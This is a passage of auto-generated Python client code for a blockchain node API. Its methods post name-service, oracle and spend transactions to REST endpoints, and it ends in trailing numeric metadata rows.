>>> thread = api.post_name_claim_tx(body, async=True)
>>> result = thread.get()
:param async bool
:param NameClaimTx body: Creates new name claim transaction (required)
:return: NameHash
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.post_name_claim_tx_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.post_name_claim_tx_with_http_info(body, **kwargs) # noqa: E501
return data
def post_name_claim_tx_with_http_info(self, body, **kwargs): # noqa: E501
"""post_name_claim_tx # noqa: E501
Create name claim transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_name_claim_tx_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param NameClaimTx body: Creates new name claim transaction (required)
:return: NameHash
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_name_claim_tx" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_name_claim_tx`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/name-claim-tx', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='NameHash', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def post_name_preclaim_tx(self, body, **kwargs): # noqa: E501
"""post_name_preclaim_tx # noqa: E501
Create name preclaim transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_name_preclaim_tx(body, async=True)
>>> result = thread.get()
:param async bool
:param NamePreclaimTx body: Creates new name preclaim transaction (required)
:return: NameCommitmentHash
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.post_name_preclaim_tx_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.post_name_preclaim_tx_with_http_info(body, **kwargs) # noqa: E501
return data
def post_name_preclaim_tx_with_http_info(self, body, **kwargs): # noqa: E501
"""post_name_preclaim_tx # noqa: E501
Create name preclaim transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_name_preclaim_tx_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param NamePreclaimTx body: Creates new name preclaim transaction (required)
:return: NameCommitmentHash
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_name_preclaim_tx" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_name_preclaim_tx`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/name-preclaim-tx', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='NameCommitmentHash', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def post_name_revoke_tx(self, body, **kwargs): # noqa: E501
"""post_name_revoke_tx # noqa: E501
Create name revoke transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_name_revoke_tx(body, async=True)
>>> result = thread.get()
:param async bool
:param NameRevokeTx body: Creates new name revoke transaction (required)
:return: NameHash
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.post_name_revoke_tx_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.post_name_revoke_tx_with_http_info(body, **kwargs) # noqa: E501
return data
def post_name_revoke_tx_with_http_info(self, body, **kwargs): # noqa: E501
"""post_name_revoke_tx # noqa: E501
Create name revoke transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_name_revoke_tx_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param NameRevokeTx body: Creates new name revoke transaction (required)
:return: NameHash
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_name_revoke_tx" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_name_revoke_tx`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/name-revoke-tx', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='NameHash', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def post_name_transfer_tx(self, body, **kwargs): # noqa: E501
"""post_name_transfer_tx # noqa: E501
Create name transfer transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_name_transfer_tx(body, async=True)
>>> result = thread.get()
:param async bool
:param NameTransferTx body: Creates new name transfer transaction (required)
:return: NameHash
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.post_name_transfer_tx_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.post_name_transfer_tx_with_http_info(body, **kwargs) # noqa: E501
return data
def post_name_transfer_tx_with_http_info(self, body, **kwargs): # noqa: E501
"""post_name_transfer_tx # noqa: E501
Create name transfer transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_name_transfer_tx_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param NameTransferTx body: Creates new name transfer transaction (required)
:return: NameHash
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_name_transfer_tx" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_name_transfer_tx`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/name-transfer-tx', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='NameHash', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def post_name_update_tx(self, body, **kwargs): # noqa: E501
"""post_name_update_tx # noqa: E501
Create name update transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_name_update_tx(body, async=True)
>>> result = thread.get()
:param async bool
:param NameUpdateTx body: Creates new name update transaction (required)
:return: NameHash
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.post_name_update_tx_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.post_name_update_tx_with_http_info(body, **kwargs) # noqa: E501
return data
def post_name_update_tx_with_http_info(self, body, **kwargs): # noqa: E501
"""post_name_update_tx # noqa: E501
Create name update transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_name_update_tx_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param NameUpdateTx body: Creates new name update transaction (required)
:return: NameHash
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_name_update_tx" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_name_update_tx`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/name-update-tx', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='NameHash', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def post_oracle_query_tx(self, body, **kwargs): # noqa: E501
"""post_oracle_query_tx # noqa: E501
Create oracle query transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_oracle_query_tx(body, async=True)
>>> result = thread.get()
:param async bool
:param OracleQueryTx body: Creates new oracle query transaction (required)
:return: OracleQueryResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.post_oracle_query_tx_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.post_oracle_query_tx_with_http_info(body, **kwargs) # noqa: E501
return data
def post_oracle_query_tx_with_http_info(self, body, **kwargs): # noqa: E501
"""post_oracle_query_tx # noqa: E501
Create oracle query transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_oracle_query_tx_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param OracleQueryTx body: Creates new oracle query transaction (required)
:return: OracleQueryResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_oracle_query_tx" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_oracle_query_tx`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/oracle-query-tx', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OracleQueryResponse', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def post_oracle_register_tx(self, body, **kwargs): # noqa: E501
"""post_oracle_register_tx # noqa: E501
Create oracle register transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_oracle_register_tx(body, async=True)
>>> result = thread.get()
:param async bool
:param OracleRegisterTx body: Creates new oracle register transaction (required)
:return: OracleRegisterResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.post_oracle_register_tx_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.post_oracle_register_tx_with_http_info(body, **kwargs) # noqa: E501
return data
def post_oracle_register_tx_with_http_info(self, body, **kwargs): # noqa: E501
"""post_oracle_register_tx # noqa: E501
Create oracle register transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_oracle_register_tx_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param OracleRegisterTx body: Creates new oracle register transaction (required)
:return: OracleRegisterResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_oracle_register_tx" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_oracle_register_tx`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/oracle-register-tx', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OracleRegisterResponse', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def post_oracle_response_tx(self, body, **kwargs): # noqa: E501
"""post_oracle_response_tx # noqa: E501
Create oracle response transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_oracle_response_tx(body, async=True)
>>> result = thread.get()
:param async bool
:param OracleResponseTx body: Creates new oracle response transaction (required)
:return: OracleQueryResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.post_oracle_response_tx_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.post_oracle_response_tx_with_http_info(body, **kwargs) # noqa: E501
return data
def post_oracle_response_tx_with_http_info(self, body, **kwargs): # noqa: E501
"""post_oracle_response_tx # noqa: E501
Create oracle response transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_oracle_response_tx_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param OracleResponseTx body: Creates new oracle response transaction (required)
:return: OracleQueryResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_oracle_response_tx" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_oracle_response_tx`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/oracle-response-tx', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OracleQueryResponse', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def post_spend_tx(self, body, **kwargs): # noqa: E501
"""post_spend_tx # noqa: E501
Create spend transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_spend_tx(body, async=True)
>>> result = thread.get()
:param async bool
:param SpendTx body: Creates new spend transaction (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.post_spend_tx_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.post_spend_tx_with_http_info(body, **kwargs) # noqa: E501
return data
def post_spend_tx_with_http_info(self, body, **kwargs): # noqa: E501
"""post_spend_tx # noqa: E501
Create spend transaction # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.post_spend_tx_with_http_info(body, async=True)
>>> result = thread.get()
:param async bool
:param SpendTx body: Creates new spend transaction (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_spend_tx" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_spend_tx`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/spend-tx', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 40.385623
| 182
| 0.612387
| 14,836
| 126,407
| 4.955109
| 0.016918
| 0.053214
| 0.023615
| 0.030362
| 0.984765
| 0.980113
| 0.976045
| 0.972318
| 0.968605
| 0.964469
| 0
| 0.017611
| 0.299683
| 126,407
| 3,129
| 183
| 40.39853
| 0.812821
| 0.053992
| 0
| 0.826573
| 0
| 0.006467
| 0.192979
| 0.05098
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.002352
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
96e7405ebb101f58fb181b2783798e19f30effd3
| 476
|
py
|
Python
|
modelchimp/models/__init__.py
|
samzer/modelchimp-server
|
48668d0f73025b2cc967006b3193b67aaf970ad7
|
[
"BSD-2-Clause"
] | 134
|
2018-11-07T08:35:47.000Z
|
2022-01-09T00:39:40.000Z
|
modelchimp/models/__init__.py
|
samzer/modelchimp-server
|
48668d0f73025b2cc967006b3193b67aaf970ad7
|
[
"BSD-2-Clause"
] | 841
|
2018-11-06T19:45:04.000Z
|
2022-03-31T13:07:16.000Z
|
modelchimp/models/__init__.py
|
samzer/modelchimp-server
|
48668d0f73025b2cc967006b3193b67aaf970ad7
|
[
"BSD-2-Clause"
] | 16
|
2019-02-08T12:48:17.000Z
|
2021-02-18T22:11:38.000Z
|
from modelchimp.models.project import Project
from modelchimp.models.membership import Membership
from modelchimp.models.experiment import Experiment
from modelchimp.models.comment import Comment
from modelchimp.models.profile import Profile
from modelchimp.models.user import User
from modelchimp.models.invitation import Invitation
from modelchimp.models.experiment_image import ExperimentImage
from modelchimp.models.experiment_custom_object import ExperimentCustomObject
| 47.6
| 77
| 0.884454
| 57
| 476
| 7.333333
| 0.280702
| 0.301435
| 0.430622
| 0.215311
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077731
| 476
| 9
| 78
| 52.888889
| 0.952164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
96ee6897adb018bcdb2ab8a290bbd4a2d96dab86
| 1,608
|
py
|
Python
|
Tests/json_tests.py
|
Jakar510/PythonExtensions
|
f29600f73454d21345f6da893a1df1b71ddacd0b
|
[
"MIT"
] | null | null | null |
Tests/json_tests.py
|
Jakar510/PythonExtensions
|
f29600f73454d21345f6da893a1df1b71ddacd0b
|
[
"MIT"
] | null | null | null |
Tests/json_tests.py
|
Jakar510/PythonExtensions
|
f29600f73454d21345f6da893a1df1b71ddacd0b
|
[
"MIT"
] | null | null | null |
from PythonExtensions.Json import *
from PythonExtensions.debug import *
pos = PlacePosition.Zero()
i = Size.Create(1200, 1050)
v = Size.Create(1280, 800)
p = PlacePosition.Zero()
print()
p.Set(-50, -50)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
print()
p.Set(-100, -100)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
print()
p.Set(-150, -150)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
print()
p.Set(-199, -199)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
print()
p.Set(-200, -200)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
print()
p.Set(-201, -201)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
print()
p.Set(-250, -250)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
print()
p.Set(-500, -500)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
print()
p.Set(-1000, -1000)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
print()
p.Set(0, 0)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
print()
p.Set(50, 50)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
print()
p.Set(100, 100)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
print()
p.Set(250, 250)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
print()
p.Set(500, 500)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
print()
p.Set(1000, 1000)
PrettyPrint(pos=pos.Update(p, i, v, KeepInView=True), i=i, v=v, p=p)
| 22.647887
| 68
| 0.651119
| 324
| 1,608
| 3.231481
| 0.101852
| 0.057307
| 0.12894
| 0.329513
| 0.845272
| 0.845272
| 0.845272
| 0.845272
| 0.845272
| 0.845272
| 0
| 0.071277
| 0.118781
| 1,608
| 70
| 69
| 22.971429
| 0.667608
| 0
| 0
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.039216
| 0
| 0.039216
| 0.294118
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8c04c79de35188e06fd0f365a5afa8aff24e8419
| 4,053
|
py
|
Python
|
src/interface/device.py
|
Abhi-1U/REST.8266
|
2ee0e9ed3baf68eaceed69f902d1cce6f84881f3
|
[
"MIT"
] | 1
|
2021-04-19T02:24:54.000Z
|
2021-04-19T02:24:54.000Z
|
src/interface/device.py
|
Abhi-1U/REST.8266
|
2ee0e9ed3baf68eaceed69f902d1cce6f84881f3
|
[
"MIT"
] | null | null | null |
src/interface/device.py
|
Abhi-1U/REST.8266
|
2ee0e9ed3baf68eaceed69f902d1cce6f84881f3
|
[
"MIT"
] | null | null | null |
from userver.server import jsonify,parse_qs,start_response
def software(request , response):
if(request.method=='GET'):
from controller.device import software_details
yield from jsonify(response, software_details())
else:
from controller.error import raise_error
yield from jsonify(response, raise_error('ERR_ME_1'))
def hardware(request , response):
if(request.method=='GET'):
from controller.device import hardware_details
yield from jsonify(response, hardware_details())
else:
from controller.error import raise_error
yield from jsonify(response, raise_error('ERR_ME_1'))
def uid(request , response):
if(request.method=='GET'):
from controller.device import unique_id
yield from jsonify(response, unique_id())
else:
from controller.error import raise_error
yield from jsonify(response, raise_error('ERR_ME_1'))
def reset_dev(request , response):
if(request.method=='GET'):
qs=parse_qs(request.qs)
from controller.device import reset
rset=''
if 'reset' in qs:
rset=(qs['reset'])
if rset=='True':
yield from reset(response)
elif(request.method=='POST'or request.method=='PATCH'):
yield from request.read_form_data()
from controller.device import reset
rset=''
if 'reset' in request.form:
rset=(request.form['reset'])
if rset=='True':
yield from reset(response)
elif(request.method=='PUT'):
yield from request.read_form_data()
rset=''
from controller.device import reset
if 'reset' in request.form:
rset=(request.form['reset'])
if rset=='True':
yield from reset(response)
else:
from controller.error import raise_error
yield from jsonify(response, raise_error('ERR_ME_1'))
def webrepl_mode(request , response):
if(request.method=='GET'):
qs=parse_qs(request.qs)
from controller.device import webrepl
rt=''
if 'repl' in qs:
rt=(qs['repl'])
if rt=='True':
yield from jsonify(response,webrepl(response))
elif(request.method=='POST'or request.method=='PATCH'):
yield from request.read_form_data()
from controller.device import webrepl
rt=''
if 'repl' in request.form:
rt=(request.form['repl'])
if rt=='True':
yield from jsonify(response,webrepl(response))
elif(request.method=='PUT'):
yield from request.read_form_data()
rt=''
from controller.device import webrepl
if 'repl' in request.form:
rt=(request.form['repl'])
if rt=='True':
webrepl(response)
yield from start_response(response)
else:
from controller.error import raise_error
yield from jsonify(response, raise_error('ERR_ME_1'))
def wc(request , response):
if(request.method=='GET'):
qs=parse_qs(request.qs)
from controller.device import webrepl_configs
rt=''
if 'password' in qs:
rt=(qs['password'])
yield from jsonify(response,webrepl_configs(rt,response))
elif(request.method=='POST'or request.method=='PATCH'):
yield from request.read_form_data()
from controller.device import webrepl_configs
rt=''
if 'password' in request.form:
rt=(request.form['password'])
yield from jsonify(response,webrepl_configs(rt,response))
elif(request.method=='PUT'):
yield from request.read_form_data()
rt=''
from controller.device import webrepl_configs
if 'password' in request.form:
rt=(request.form['password'])
if rt=='True':
webrepl_configs(rt,response)
yield from start_response(response)
else:
from controller.error import raise_error
yield from jsonify(response, raise_error('ERR_ME_1'))
| 34.939655
| 65
| 0.619541
| 487
